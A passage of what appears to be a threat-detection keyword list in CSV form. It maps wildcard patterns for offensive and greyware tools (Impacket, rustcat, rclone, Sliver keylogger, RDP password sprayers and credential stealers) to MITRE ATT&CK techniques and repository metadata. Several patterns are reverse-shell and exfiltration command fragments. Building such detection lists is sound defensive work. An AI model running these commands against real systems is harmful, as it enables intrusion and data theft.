to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive 
!","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.dos*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.exe*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.go*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.gz*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.hta*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.iso*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.jar*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve 
payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.js*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.lnk*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.log*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.mac*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.mam*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.msi*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.msp*","greyware_tool_keyword","github","Github raw access 
content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.nexe*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.nim*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.otm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.out*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.ova*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.pem*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" 
+"*raw.githubusercontent.com*.pfx*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.pl*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.plx*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.pm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.ppk*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.ps1*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.psm1*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive 
!","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.pub*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.py*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.pyc*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.pyo*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.rar*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.raw*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.reg*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve 
payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.rgs*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.RGS*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.run*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.scpt*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.script*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.sct*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.sh*","greyware_tool_keyword","github","Github raw access 
content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.ssh*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.sys*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.teamserver*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.temp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.tgz*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.tmp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" 
+"*raw.githubusercontent.com*.vb*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.vbs*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.vbscript*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.ws*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.wsf*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.wsh*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.X86*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False 
positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.X86_64*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.xlam*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.xlm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.xlsm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.zip*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw_keylogger.tar.gz*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" 
+"*rawrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rawSHA1_linkedIn_fmt_plug*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*rbcd.py -delegate-from * -delegate-to * -dc-ip * -action write *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*rbcd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*RBCD_Petitpotam_VulnerableServers.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*rbsec/dnscan*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*rc4.py *.bin*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*rcan listen -ib *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat c -s bash *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse 
shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat connect -s bash*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat listen 55660*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat listen -ie *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat listen -l *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat-v3.*darwin-aarch64*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat-v3.*-darwin-x86_64*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - 
TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z"
+"*rcat-v3.*-linux-x86_64*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z"
+"*RCE-exploits*","offensive_tool_keyword","POC","poc rce - The exploit samples database is a repository for RCE (remote code execution) exploits and Proof-of-Concepts for WINDOWS. the samples are uploaded for education purposes for red and blue teams.","T1059.001 - T1210.001 - T1212 - T1055.012","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/smgorelik/Windows-RCE-exploits","1","1","N/A","N/A","8","731","187","2019-07-29T23:28:15Z","2018-02-13T11:23:40Z"
+"*rclone copy *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z"
+"*rclone.exe config create remote mega user *","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z"
+"*rclone.exe* copy *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z"
+"*rclone.exe* -l * *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","interactive mode","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z"
+"*RDE1-main.zip*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*rdi_net_user.cpp*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z"
+"*rdp_check.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*rdp_doublepulsar_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*RDPassSpray.*.log*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z"
+"*RDPassSpray.csv*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z"
+"*RDPassSpray.py*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z"
+"*RDPassSpray-master*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z"
+"*rdpbrute.py*","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","5","499","114","2023-09-27T04:40:54Z","2021-08-18T08:58:14Z"
+"*RDP-Caching.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*RDPCredentialStealer.zip*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z"
+"*RDPCredentialStealer-main*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z"
